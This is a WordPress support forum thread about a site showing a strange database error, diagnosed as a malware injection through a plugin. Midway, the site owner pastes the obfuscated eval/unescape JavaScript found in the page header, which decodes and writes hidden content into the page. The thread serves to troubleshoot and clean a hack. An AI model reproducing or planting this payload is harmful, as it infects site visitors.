Title: Weird Database Error
Last modified: August 20, 2016

---

# Weird Database Error

 *  [spnweb](https://wordpress.org/support/users/spnweb/)
 * (@spnweb)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/)
 * Hello Everyone, I need some help
 * I keep getting this weird error sometimes on the top of my site.
 *     ```
       Couldn't connect to database server.Couldn't find database jimbob_jc.An unexpected problem has occured with the application.
       SELECT statscurl_id FROM <code>statscurl</code> WHERE statscurl_ip = '';
       ```
   
 * Can anyone tell me what the hell this is?

Viewing 14 replies - 1 through 14 (of 14 total)

 *  [michael.mariart](https://wordpress.org/support/users/michaelmariart/)
 * (@michaelmariart)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953522)
 * Is the database named ‘jimbob_jc’ part of your site or one that you have set 
   up? If it is, then your connection details are wrong and you’ll need to change
   those.
 * If it’s not, then your site has most likely been hacked to include some code 
   from an exteral source that’s trying to connect to that databse.
 *  Thread Starter [spnweb](https://wordpress.org/support/users/spnweb/)
 * (@spnweb)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953525)
 * thats not my database name.
 *  [michael.mariart](https://wordpress.org/support/users/michaelmariart/)
 * (@michaelmariart)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953527)
 * Then see my second point…
 * > If it’s not, then your site has most likely been hacked to include some code
   > from an exteral source that’s trying to connect to that databse.
 * There’s a lot of information on the forums here about fixing hacks, so do some
   searching and see what you can find.
 *  Thread Starter [spnweb](https://wordpress.org/support/users/spnweb/)
 * (@spnweb)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953529)
 * ive been trying to find something about it but cant. all the plugins im using
   are from the wordpress plugin directory
 *  [michael.mariart](https://wordpress.org/support/users/michaelmariart/)
 * (@michaelmariart)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953531)
 * After a quick two-second search on the forum here…
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   
   [http://wordpress.org/support/topic/wordpress-hacking-in-32012?replies=3](http://wordpress.org/support/topic/wordpress-hacking-in-32012?replies=3)
 * Out of over 7,000 results…
 *  [sneedderek](https://wordpress.org/support/users/sneedderek/)
 * (@sneedderek)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953606)
 * I’m pretty sure [@spnweb](https://wordpress.org/support/users/spnweb/) meant 
   he couldn’t find anything on ‘jimbob_jc’ specifically, not so much about WordPress
   getting hacked in general.
 * I had the same error show up on my front-end….
 * I found that my Facebook Page “Like Box” social plugin was the cause. When I 
   disabled it, the error didn’t show up anymore.
 * I’m not guaranteeing this to be the cause or solution, as I just barely found
   out and hadn’t had too much time to troubleshoot, but it seems to be working 
   for me. I’ll try to let you know if I can get the “Like Box” back without the
   error.
 *  [sneedderek](https://wordpress.org/support/users/sneedderek/)
 * (@sneedderek)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953644)
 * This was a hack… an injection of code (aka malware.)
    And yes, it was a plugin
   that caused it. That’s what I get for testing unofficially released plugins not
   in the WordPress.org repo yet.
 * This is a reliable and quick way to check for malware [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
   and has been mentioned many times around here. (I have no affiliation)
 * Or visit your site and do a “view source”… look around, most likely in the HEAD
   section for some encoded html or javascript or any scripts that call an outside
   domain you’re not familiar with.
 * Once you’ve verified something isn’t looking right, disable any plugins you think
   may not be legitimate, refresh your site and see if the malware strings are still
   present. If they are, then the code may have been injected into your theme or
   WordPress install. I won’t rewrite the wheel here, so just check those links 
   above for more info on how to troubleshoot and solve.
 * Get it solved quick though! Google will eventually blacklist your site, and it
   sometimes takes awhile for that lift to come off after cleaning the injection.
 *  [bishopsdementia](https://wordpress.org/support/users/bishopsdementia/)
 * (@bishopsdementia)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953645)
 * I had this error pop up on 2 pages this morning, within the last 48 hours have
   installed three new plugin… Ultimate security, Bad query blocker and duplicator&
   the standard myriad of hand coded security necessary for a adequate install hardening.{
   htcaccess, hiding files, header mods}.
    I had recently had to nuke another security
   plugin install manually from my directory as it conflicted with plugins. I did
   not turn up a search result for the strings. I did run across a post on stackoverflow
   which curiously enough popped up with in the last 36 hours of this event. [here](http://stackoverflow.com/questions/11902693/couldnt-connect-to-database-server-couldnt-find-database-jimbob-jc).
   Perhaps a code update witha shared plugin is conflicting? Changing the template
   applied within the page attribute that I had applied to the page made the error
   disappear, but as sneedderek implied I definitely get a malware return from the
   scan link he provided. Further findings welcome…
 *  Thread Starter [spnweb](https://wordpress.org/support/users/spnweb/)
 * (@spnweb)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953654)
 * i found this weird code in the header
 *     ```
       <script type="text/javascript">
       <!--
       eval(unescape('%66%75%6e%63%74%69%6f%6e%20%62%30%37%36%64%30%33%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%37%32%31%35%38%36%36%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%35%36%36%31%34%36%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%33%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
       eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%62%30%37%36%64%30%33%28%27') + '%3e%6b%6e%6d%6b%1e%69%67%6f%3c%25%74%77%71%6b%6a%76%66%61%64%74%22%1b%67%65%3c%23%64%62%72%5c%5f%66%69%75%64%6e%75%58%67%73%6e%6a%68%5c%58%6a%5a%6b%6e%68%2c%77%73%7e%6f%61%73%63%67%64%77%2b%64%76%77%26%15%1b%66%6c%64%66%3c%22%64%75%77%6a%35%24%2a%77%77%72%2e%72%76%61%6b%60%6a%73%78%2d%6f%6c%62%29%28%29%31%35%34%2b%76%65%2c%63%6f%6d%74%64%6d%70%28%6b%6e%70%6c%60%68%73%2a%65%6a%75%63%6b%77%59%62%79%60%6f%68%59%5b%69%2c%6c%6b%6a%2b%72%79%70%6a%61%76%29%66%58%5e%5a%69%2c%62%78%76%3f%70%64%6a%3c%28%2a%2a%22%1a%73%7e%6b%61%39%22%74%64%73%70%28%66%77%72%2c%1b%69%61%67%63%58%3c%25%5a%6f%6e%26%15%2a%38%09%01%0f%01%3f%71%64%69%61%6f%79%1b%72%75%6b%67%3c%22%70%66%73%76%2e%6f%58%70%5d%76%65%69%60%6c%75%22%1a%72%67%66%39%27%63%74%77%6b%36%28%2a%73%76%7c%2d%77%73%66%6a%60%6b%70%74%2d%6b%6d%6c%2a%6e%6f%6b%2e%61%76%25%3f%3f%2b%72%68%69%65%6e%77%3e%0c%01%0b%03%3f%77%62%67%60%6e%72%1b%74%70%6b%63%3e%22%76%60%7d%77%2f%64%58%76%58%76%61%6b%60%6a%73%2c%1b%73%6c%66%3f%22%63%70%75%6b%30%2e%24%72%77%77%2d%71%76%66%6e%62%6b%76%72%23%6a%6c%67%2a%2b%29%36%30%36%2a%73%6f%22%66%6f%68%77%67%6d%77%2d%69%6f%75%66%6e%6d%73%2f%66%69%75%64%6e%75%58%67%73%6e%6a%68%5c%58%6a%2c%6b%6e%68%2a%77%62%67%60%6e%72%76%29%60%6c%75%5b%5a%67%5c%57%5a%73%63%69%63%6b%77%2a%63%76%3b%71%6a%69%39%2d%2d%2b%22%3d%38%28%76%67%6d%6e%6b%72%38%0c%02%0c%01%38%74%66%68%64%65%77%1e%72%70%68%64%3c%25%75%64%72%73%24%61%5d%70%58%75%66%69%67%69%77%23%39%02%01%2f%24%1b%3c%18%5e%41%45%38%56%3c%50%1b%24%2f%0c%02%75%58%6e%19%40%4d%56%37%5a%43%3d%39%59%38%61%5f%71%1b%3d%1f%70%19%5d%64%58%70%74%69%68%1b%31%18%67%79%77%6e%34%5f%29%5f%2a%75%70%72%2c%76%78%66%6c%65%6b%74%76%2d%6d%6b%62%5e%2e%26%29%33%32%34%5c%2a%72%6c%2e%58%66%68%6e%6d%5a%2f%58%64%6c%60%6a%2e%58%60%5c%7d%2d%6e%66%6b%1a%2f%19%6a%68%6d%67%60%17%31%1c%2e%28%31%32%33%34%37%2b%34%61%17%7c%3b%09%01%29%21%1b%5b%5e%3d%1a%25%24%0c%04%3a%2a%75%66%69%67%69%77%3c7215866%37%32%38%36%33%33%36' + unescape('%27%29%29%3b'));
       // -->
       </script>
       <script type="text/javascript">
       <!--
       eval(unescape('%66%75%6e%63%74%69%6f%6e%20%71%31%31%38%64%37%65%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%32%33%38%31%38%32%38%30%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%35%39%35%33%33%38%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%33%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
       eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%71%31%31%38%64%37%65%28%27') + '%3d%76%69%6f%67%6b%73%18%78%73%6e%61%32%1b%77%6b%75%70%2a%65%5b%7a%5b%73%63%67%62%6b%78%1f%1c%76%6d%65%33%1a%66%72%79%69%31%25%2c%75%72%76%2e%6e%6b%71%61%67%72%64%22%60%6d%6c%2e%5b%6e%5b%76%2f%6f%6a%74%6b%6f%77%2a%65%6b%7b%67%6c%75%22%2a%2d%3a%2b%31%2d%68%63%62%2e%64%73%17%3f%3f%25%70%61%69%64%68%78%3e23818280%34%36%39%30%31%36%32' + unescape('%27%29%29%3b'));
       // -->
       </script>
       ```
   
 * but i dont know which plugin or page it’s coming from
 *  [sneedderek](https://wordpress.org/support/users/sneedderek/)
 * (@sneedderek)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953656)
 * Yep…. hackers often use encoded Unescape when hacking and inserting links. That’s
   what happened to me.
 * There are or at least used to be some legit reasons to encode like this, for 
   example to hide a email address from spam bots. But more than likely that’s not
   the case here.
 * There are some decoder tools out there, I don’t know of any to recommend as I
   haven’t used one in years. But trusty Google will help.
 * I know it’s a pain, but I would start by deactivating plugin’s one-by-one, checking
   each time if this encoded script still appears. That’s the easiest 1st step to
   find the culprit.
 * Then go from there if you don’t find it in plugins. I’ve had injections in the
   past show up in Header and Footer php files. It could be anywhere really. If 
   you have an awesome web host, they may help you too as they don’t want that stuff
   spreading ;).
 * Good luck!
 *  [michael.mariart](https://wordpress.org/support/users/michaelmariart/)
 * (@michaelmariart)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953682)
 * Hacks like this aren’t added by a plugin, or theme.
 * They are dong using vunerable files in your plugin on theme.
 * Once the site has been hacked, you can find many files, including core WordPress
   files, have been modified by the hack without you knowing. The most that I’ve
   seen on one far is 24.
 * Also, don’t check the files that you have locally. Those files will not have 
   changed. The files on your server will have changed so you can download them 
   and go through them again. You will most likely get some of the files blocked
   from your anti-virus software though.
 *  Thread Starter [spnweb](https://wordpress.org/support/users/spnweb/)
 * (@spnweb)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953683)
 * i found the problem and removed it, it was a plugin.
 * the issue has been resolved.
 * thanks for the help everyone.
 *  [sneedderek](https://wordpress.org/support/users/sneedderek/)
 * (@sneedderek)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953684)
 * [@michael](https://wordpress.org/support/users/michael/).mariart
    I guess I needed
   to be more specific……. I didn’t mean for anyone to understand that the malware
   was “added by a plugin or theme” ……. with our issue, the malware was located 
   in a plugin & theme we had. Like you said, these files were “modified” by the
   hack. This is why I used the word “injection”… of which implies this happened
   in a server environment.
 * [@spnweb](https://wordpress.org/support/users/spnweb/)
    Awesome. Congrats on 
   resolving your issue!
 *  [kmessinger](https://wordpress.org/support/users/kmessinger/)
 * (@kmessinger)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953685)
 * These resources will help you:
    [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * More Resources:
    [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/)
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
   [http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://www.studiopress.com/tips/wordpress-site-security.htm](http://www.studiopress.com/tips/wordpress-site-security.htm)

Viewing 14 replies - 1 through 14 (of 14 total)

The topic ‘Weird Database Error’ is closed to new replies.

## Tags

 * [Database Error](https://wordpress.org/support/topic-tag/database-error/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 14 replies
 * 5 participants
 * Last reply from: [kmessinger](https://wordpress.org/support/users/kmessinger/)
 * Last activity: [13 years, 9 months ago](https://wordpress.org/support/topic/weird-database-error-2-2/#post-2953685)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics